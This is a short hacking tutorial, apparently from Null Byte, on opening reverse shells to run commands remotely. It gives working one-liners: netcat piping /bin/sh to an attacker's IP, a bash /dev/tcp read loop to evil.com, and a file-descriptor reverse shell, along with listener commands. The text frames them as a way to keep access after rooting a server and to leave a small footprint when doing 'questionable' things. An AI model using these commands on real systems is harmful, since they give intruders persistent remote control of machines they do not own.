How to Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASH
Reverse shells are useful for issuing commands to a remote client when the client is behind something such as a NAT. You might say, "But can't a normal shell or simple SSH tunnel do the same thing?". No, it can't. All over the internet I see a lot of confusion regarding the difference between a normal shell and a reverse shell. Let's clear this up before we get started.
- A reverse shell works by the remote computer sending its shell to a specific user, rather than binding it to a port, which would be unreachable in many circumstances. This allows root commands over the remote server.
- A bind shell is when a user uses BASH and binds a shell to a local port that anyone can issue commands to on the local network.
Reverse shells are also commonly used for nefarious purposes, like after a hacker roots a server, they will likely make a reverse shell so they have easy access to the computer for future use. Let's take a look at a few ways we could make one on an example remote computer. I trust it is one that you haven't used.
- Remote Unix host
- netcat installed from your package repository
When shelled in to the remote host, simply issue the following command to send the shell back home:
nc -c /bin/sh <your IP> <any unfiltered port>
You could even pipe BASH through netcat.
/bin/sh | nc <your IP> <any unfiltered port>
Then listen for the shell:
nc -l -p <same unfiltered port> -vvv
This technique is for when netcat isn't available on the remote machine and when you want to leave a small footprint when you're doing things of a questionable nature.
Listen for the shell:
nc -l -p <any unfiltered port> -vvv
Now create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.
exec 5<>/dev/tcp/evil.com/<same unfiltered port> $ cat <&5 | while read line; do $line 2>&5 >&5; done
Or another reverse shell:
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
Then, simply send raw commands through netcat.
Be a Part of Null Byte!